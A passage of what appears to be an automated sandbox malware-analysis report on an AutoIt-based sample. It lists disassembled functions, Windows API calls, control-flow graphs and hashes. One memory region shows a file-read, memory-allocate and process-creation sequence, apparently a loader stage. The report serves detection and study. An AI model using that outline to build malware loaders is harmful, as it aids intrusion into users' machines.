                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                        • API String ID: 98802146-2727554177
                                        • Opcode ID: 56d268ca4fcca51eca462132f737ea9197c6e66c649478210400cb389a573f18
                                        • Instruction ID: 37dd1c67f63c81015c21c3c3e6ece37009e18d7eb2e5b845e3dfc04d1e101adb
                                        • Opcode Fuzzy Hash: 56d268ca4fcca51eca462132f737ea9197c6e66c649478210400cb389a573f18
                                        • Instruction Fuzzy Hash: 437167714143449EC314EF65E882EAFBBE8FF89740F44092EF645831B1EB759A48CB62
                                        Function 00BF2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GetSysColorBrush.USER32(0000000F), ref: 00BF2B8E
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00BF2B9D
                                        • LoadIconW.USER32(00000063), ref: 00BF2BB3
                                        • LoadIconW.USER32(000000A4), ref: 00BF2BC5
                                        • LoadIconW.USER32(000000A2), ref: 00BF2BD7
                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BF2BEF
                                        • RegisterClassExW.USER32(?), ref: 00BF2C40
                                          • Part of subcall function 00BF2CD4: GetSysColorBrush.USER32(0000000F), ref: 00BF2D07
                                          • Part of subcall function 00BF2CD4: RegisterClassExW.USER32(00000030), ref: 00BF2D31
                                          • Part of subcall function 00BF2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF2D42
                                          • Part of subcall function 00BF2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00BF2D5F
                                          • Part of subcall function 00BF2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BF2D6F
                                          • Part of subcall function 00BF2CD4: LoadIconW.USER32(000000A9), ref: 00BF2D85
                                          • Part of subcall function 00BF2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BF2D94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                        • String ID: #$0$AutoIt v3
                                        • API String ID: 423443420-4155596026
                                        • Opcode ID: 6f271adb89aa198981dce9d6b5d63cb2c25a2e323e8f9f96f76667ebcbff02b4
                                        • Instruction ID: 4952e6d166f665e3f2c83282812e70d40d079aba2121a8dc35acb49fbb395b0c
                                        • Opcode Fuzzy Hash: 6f271adb89aa198981dce9d6b5d63cb2c25a2e323e8f9f96f76667ebcbff02b4
                                        • Instruction Fuzzy Hash: 98213A70E00358ABDB109FA6EC85FAD7FB4FB49B54F08005AEA00A76B1D3B54550CF94
                                        Function 00BF3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 443 bf3170-bf3185 444 bf3187-bf318a 443->444 445 bf31e5-bf31e7 443->445 446 bf318c-bf3193 444->446 447 bf31eb 444->447 445->444 448 bf31e9 445->448 449 bf3199-bf319e 446->449 450 bf3265-bf326d PostQuitMessage 446->450 452 c32dfb-c32e23 call bf18e2 call c0e499 447->452 453 bf31f1-bf31f6 447->453 451 bf31d0-bf31d8 DefWindowProcW 448->451 455 bf31a4-bf31a8 449->455 456 c32e7c-c32e90 call c5bf30 449->456 458 bf3219-bf321b 450->458 457 bf31de-bf31e4 451->457 487 c32e28-c32e2f 452->487 459 bf321d-bf3244 SetTimer RegisterWindowMessageW 453->459 460 bf31f8-bf31fb 453->460 462 bf31ae-bf31b3 455->462 463 c32e68-c32e77 call c5c161 455->463 456->458 480 c32e96 456->480 458->457 459->458 464 bf3246-bf3251 CreatePopupMenu 459->464 466 bf3201-bf3214 KillTimer call bf30f2 call bf3c50 460->466 467 c32d9c-c32d9f 460->467 470 bf31b9-bf31be 462->470 471 c32e4d-c32e54 462->471 463->458 464->458 466->458 473 c32da1-c32da5 467->473 474 c32dd7-c32df6 MoveWindow 467->474 478 bf31c4-bf31ca 470->478 479 bf3253-bf3263 call bf326f 470->479 471->451 483 c32e5a-c32e63 call c50ad7 471->483 481 c32da7-c32daa 473->481 482 c32dc6-c32dd2 SetFocus 473->482 474->458 478->451 478->487 479->458 480->451 481->478 488 c32db0-c32dc1 call bf18e2 481->488 482->458 483->451 487->451 491 c32e35-c32e48 call bf30f2 call bf3837 487->491 488->458 491->451
                                        APIs
                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00BF316A,?,?), ref: 00BF31D8
                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,00BF316A,?,?), ref: 00BF3204
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BF3227
                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00BF316A,?,?), ref: 00BF3232
                                        • CreatePopupMenu.USER32 ref: 00BF3246
                                        • PostQuitMessage.USER32(00000000), ref: 00BF3267
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                        • String ID: TaskbarCreated
                                        • API String ID: 129472671-2362178303
                                        • Opcode ID: 95f1a724247a5f50324ff54d4409b981be80a538ac945f7abc8e14770b202856
                                        • Instruction ID: 9cbb0af2217874c09639502c3dd75df5ac39e26a0f70f381fe2588ccd46193f5
                                        • Opcode Fuzzy Hash: 95f1a724247a5f50324ff54d4409b981be80a538ac945f7abc8e14770b202856
                                        • Instruction Fuzzy Hash: CC41383125020CA7DF146B78DD89F7D3AD9E706B44F0801AAFF16971A2CB71CB489765
                                        Function 00C28D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 499 c28d45-c28d55 500 c28d57-c28d6a call c1f2c6 call c1f2d9 499->500 501 c28d6f-c28d71 499->501 518 c290f1 500->518 503 c28d77-c28d7d 501->503 504 c290d9-c290e6 call c1f2c6 call c1f2d9 501->504 503->504 505 c28d83-c28dae 503->505 520 c290ec call c227ec 504->520 505->504 508 c28db4-c28dbd 505->508 511 c28dd7-c28dd9 508->511 512 c28dbf-c28dd2 call c1f2c6 call c1f2d9 508->512 516 c290d5-c290d7 511->516 517 c28ddf-c28de3 511->517 512->520 521 c290f4-c290f9 516->521 517->516 523 c28de9-c28ded 517->523 518->521 520->518 523->512 526 c28def-c28e06 523->526 528 c28e23-c28e2c 526->528 529 c28e08-c28e0b 526->529 532 c28e4a-c28e54 528->532 533 c28e2e-c28e45 call c1f2c6 call c1f2d9 call c227ec 528->533 530 c28e15-c28e1e 529->530 531 c28e0d-c28e13 529->531 537 c28ebf-c28ed9 530->537 531->530 531->533 535 c28e56-c28e58 532->535 536 c28e5b-c28e79 call c23820 call c229c8 * 2 532->536 562 c2900c 533->562 535->536 572 c28e96-c28ebc call c29424 536->572 573 c28e7b-c28e91 call c1f2d9 call c1f2c6 536->573 539 c28edf-c28eef 537->539 540 c28fad-c28fb6 call c2f89b 537->540 539->540 544 c28ef5-c28ef7 539->544 551 c28fb8-c28fca 540->551 552 c29029 540->552 544->540 548 c28efd-c28f23 544->548 548->540 553 c28f29-c28f3c 548->553 551->552 557 c28fcc-c28fdb GetConsoleMode 551->557 555 c2902d-c29045 ReadFile 552->555 553->540 558 c28f3e-c28f40 553->558 560 c290a1-c290ac GetLastError 555->560 561 c29047-c2904d 555->561 557->552 563 c28fdd-c28fe1 557->563 558->540 564 c28f42-c28f6d 558->564 566 c290c5-c290c8 560->566 567 c290ae-c290c0 call c1f2d9 call c1f2c6 560->567 561->560 568 c2904f 561->568 570 c2900f-c29019 call c229c8 562->570 563->555 569 c28fe3-c28ffd ReadConsoleW 563->569 564->540 571 c28f6f-c28f82 564->571 580 c29005-c2900b call c1f2a3 566->580 581 c290ce-c290d0 566->581 567->562 576 c29052-c29064 568->576 578 c2901e-c29027 569->578 579 c28fff GetLastError 569->579 570->521 571->540 583 c28f84-c28f86 571->583 572->537 573->562 576->570 587 c29066-c2906a 576->587 578->576 579->580 580->562 581->570 583->540 584 c28f88-c28fa8 583->584 584->540 593 c29083-c2908e 587->593 594 c2906c-c2907c call c28a61 587->594 599 c29090 call c28bb1 593->599 600 c2909a-c2909f call c288a1 593->600 605 c2907f-c29081 594->605 606 c29095-c29098 599->606 600->606 605->570 606->605
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06da4f80cfe73f8800f08c0d81f24fc61ae1630107047897c55257008639fdaa
                                        • Instruction ID: 2733356bb96c4ff547a9fee087565e5d8332d9497d538f08553ffd6526bda3f2
                                        • Opcode Fuzzy Hash: 06da4f80cfe73f8800f08c0d81f24fc61ae1630107047897c55257008639fdaa
                                        • Instruction Fuzzy Hash: 2FC1F375E04269AFDB11DFA8E841BEDBBB0FF0D310F144059E425A7792CB349A42DB61
                                        Function 00B60920 Relevance: 10.7, APIs: 7, Instructions: 151fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 607 b60920-b60972 call b60820 CreateFileW 610 b60974-b60976 607->610 611 b6097b-b60988 607->611 612 b60ad4-b60ad8 610->612 614 b6098a-b60996 611->614 615 b6099b-b609b2 VirtualAlloc 611->615 614->612 616 b609b4-b609b6 615->616 617 b609bb-b609e1 CreateFileW 615->617 616->612 618 b60a05-b60a1f ReadFile 617->618 619 b609e3-b60a00 617->619 621 b60a43-b60a47 618->621 622 b60a21-b60a3e 618->622 619->612 624 b60a68-b60a7f WriteFile 621->624 625 b60a49-b60a66 621->625 622->612 626 b60a81-b60aa8 624->626 627 b60aaa-b60acf FindCloseChangeNotification VirtualFree 624->627 625->612 626->612 627->612
                                        APIs
                                        • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00B60965
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022038758.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_b60000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                        • Instruction ID: 72b585a1c89dbc2345f36aa57077cf6bcc5f63417346767eee86068e43ecf7fd
                                        • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                        • Instruction Fuzzy Hash: FC51E775A50208FBEB20DFE5CC89FDF77B8AF48740F108554F64AEA1C0DA789A449B60
                                        Function 00BF2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 647 bf2c63-bf2cd3 CreateWindowExW * 2 ShowWindow * 2
                                        APIs
                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BF2C91
                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BF2CB2
                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00BF1CAD,?), ref: 00BF2CC6
                                        • ShowWindow.USER32(00000000,?,?,?,?,?,?,00BF1CAD,?), ref: 00BF2CCF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$CreateShow
                                        • String ID: AutoIt v3$edit
                                        • API String ID: 1584632944-3779509399
                                        • Opcode ID: 155c06cb2817dee4ea48ecb56649213e5ebfbd5ef5b49676fe58124448fddb70
                                        • Instruction ID: d31ee35daaded1327a5c609ab975cfeec6467905c234a4e477caba5c4e1a3a77
                                        • Opcode Fuzzy Hash: 155c06cb2817dee4ea48ecb56649213e5ebfbd5ef5b49676fe58124448fddb70
                                        • Instruction Fuzzy Hash: 38F0D4756402D07AEB311B27AC48F7B2EBDD7CBF68B09006EFD00A25B1C6755850DAB4
                                        Function 00C62947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C62C05
                                        • DeleteFileW.KERNEL32(?), ref: 00C62C87
                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C62C9D
                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C62CAE
                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C62CC0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: File$Delete$Copy
                                        • String ID:
                                        • API String ID: 3226157194-0
                                        • Opcode ID: 580ef9065341c74a8283b63987d59f4f1437e0c6a06cb436adba8de85c19d1d4
                                        • Instruction ID: 013b7a8ea300a83d6aabf2c20e3b0bff7368a5c1756eea6ca6fd7de79cb2909f
                                        • Opcode Fuzzy Hash: 580ef9065341c74a8283b63987d59f4f1437e0c6a06cb436adba8de85c19d1d4
                                        • Instruction Fuzzy Hash: 10B13C72E0051DABDF21DBA4CC85EEEB7BDEF49350F1040A6F609E7151EA309A849F61
                                        Function 00B623F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 148fileCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 868 b623f0-b62515 call b60000 call b622e0 CreateFileW 875 b62517 868->875 876 b6251c-b6252c 868->876 877 b625e9-b625ee 875->877 879 b62533-b6254d VirtualAlloc 876->879 880 b6252e 876->880 881 b62554-b6256b ReadFile 879->881 882 b6254f 879->882 880->877 883 b6256f-b62584 call b61070 881->883 884 b6256d 881->884 882->877 886 b62589-b625c3 call b62320 call b612e0 883->886 884->877 891 b625c5-b625da call b62370 886->891 892 b625df-b625e7 886->892 891->892 892->877
                                        APIs
                                          • Part of subcall function 00B622E0: Sleep.KERNELBASE(000001F4), ref: 00B622F1
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00B6250B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022038758.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_b60000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CreateFileSleep
                                        • String ID: GWZNHWCUQT
                                        • API String ID: 2694422964-474333328
                                        • Opcode ID: f736115ccedf803652b755adf4beab10a3a345379c63b3758c6f487b74687f57
                                        • Instruction ID: 4d5ac076a40cac9c6aa1edb328de53ef473d36c0d2ac08afc2d3b3a921df7eb7
                                        • Opcode Fuzzy Hash: f736115ccedf803652b755adf4beab10a3a345379c63b3758c6f487b74687f57
                                        • Instruction Fuzzy Hash: 4F518131D14249EBEF24DBA4C865BEEB7B5EF54300F004598E609BB2C0DB791B45CBA5
                                        Function 00BF3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 931 bf3b1c-bf3b27 932 bf3b99-bf3b9b 931->932 933 bf3b29-bf3b2e 931->933 935 bf3b8c-bf3b8f 932->935 933->932 934 bf3b30-bf3b48 RegOpenKeyExW 933->934 934->932 936 bf3b4a-bf3b69 RegQueryValueExW 934->936 937 bf3b6b-bf3b76 936->937 938 bf3b80-bf3b8b RegCloseKey 936->938 939 bf3b78-bf3b7a 937->939 940 bf3b90-bf3b97 937->940 938->935 941 bf3b7e 939->941 940->941 941->938
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00BF3B0F,SwapMouseButtons,00000004,?), ref: 00BF3B40
                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00BF3B0F,SwapMouseButtons,00000004,?), ref: 00BF3B61
                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00BF3B0F,SwapMouseButtons,00000004,?), ref: 00BF3B83
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID: Control Panel\Mouse
                                        • API String ID: 3677997916-824357125
                                        • Opcode ID: af7722a501f831a38119be4eae44e8d76d99e42a8b4c90607b63a69917cb8fb5
                                        • Instruction ID: 9320895b2379a88bb1f76728ccee472ee4fa0c7dcfd76ada7ec0999eefc9943e
                                        • Opcode Fuzzy Hash: af7722a501f831a38119be4eae44e8d76d99e42a8b4c90607b63a69917cb8fb5
                                        • Instruction Fuzzy Hash: F4112AB5511208FFDB218FA5DC94ABEB7F8EF04B84B10449AA905D7110D3319E449764
                                        Function 00BFDFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                        Download Yara Rule
                                        Strings
                                        • Variable must be of type 'Object'., xrefs: 00C432B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Variable must be of type 'Object'.
                                        • API String ID: 0-109567571
                                        • Opcode ID: 9d66d13aa7e2f9c446021f10e5dc0cc6c18595ac72988a9e20d431670db55191
                                        • Instruction ID: f0836118aa69dfcdb5b8b9a0038fd42a5be4ecf837cb949e94ed946fe88f1ee6
                                        • Opcode Fuzzy Hash: 9d66d13aa7e2f9c446021f10e5dc0cc6c18595ac72988a9e20d431670db55191
                                        • Instruction Fuzzy Hash: D8C26C71A00219CFCB24CF58C885ABDB7F1FF48310F2481A9EA65AB2A1D775ED45CB91
                                        Function 00BF3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C333A2
                                          • Part of subcall function 00BF6B57: _wcslen.LIBCMT ref: 00BF6B6A
                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BF3A04
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: IconLoadNotifyShell_String_wcslen
                                        • String ID: Line:
                                        • API String ID: 2289894680-1585850449
                                        • Opcode ID: 2de98a3531405e49deec157ca6f967766bb046a150743f829fb8da1443c344fb
                                        • Instruction ID: ef633eea71177b7bf4a09630cf73f814a1d92de023717c1762cfbbddf3423a42
                                        • Opcode Fuzzy Hash: 2de98a3531405e49deec157ca6f967766bb046a150743f829fb8da1443c344fb
                                        • Instruction Fuzzy Hash: 9A31C571408348AAC325EB10DC45FFFB7D8AB41754F0845AAFA99930A2DB709B4DC7D6
                                        Function 00C0FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00C10668
                                          • Part of subcall function 00C132A4: RaiseException.KERNEL32(?,?,?,00C1068A,?,00CC1444,?,?,?,?,?,?,00C1068A,00BF1129,00CB8738,00BF1129), ref: 00C13304
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00C10685
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Exception@8Throw$ExceptionRaise
                                        • String ID: Unknown exception
                                        • API String ID: 3476068407-410509341
                                        • Opcode ID: 4412f4f0dab3954c29c9fbe6fbd94e7380c6825f5b1f654141079c3fa00be731
                                        • Instruction ID: 9e3a49975f3a152b97f8b8ea0c85a5a87d18c8c035ceab5e94242db0a8578276
                                        • Opcode Fuzzy Hash: 4412f4f0dab3954c29c9fbe6fbd94e7380c6825f5b1f654141079c3fa00be731
                                        • Instruction Fuzzy Hash: 9CF0C23490030DB7CB14BA64D846CDE7B6D5E02354B704135B924D69D2EFB1DBEAF690
                                        Function 00B61000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00B61045
                                        • ExitProcess.KERNEL32(00000000), ref: 00B61064
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022038758.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_b60000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Process$CreateExit
                                        • String ID: D
                                        • API String ID: 126409537-2746444292
                                        • Opcode ID: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                        • Instruction ID: 57cf7f381cded42dd39dcd78998d75e68a206fe68b7b4246c664ddefd73ffb7e
                                        • Opcode Fuzzy Hash: 359d21864460d0aa6716f03c0fb9f93045a71ab212c145842ddc1246808d9d7c
                                        • Instruction Fuzzy Hash: 37F0FF7254024CABDF60DFE4CC49FEE77BCBF04701F148549FB0A9A184DA7896489B61
                                        Function 00C63017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00C6302F
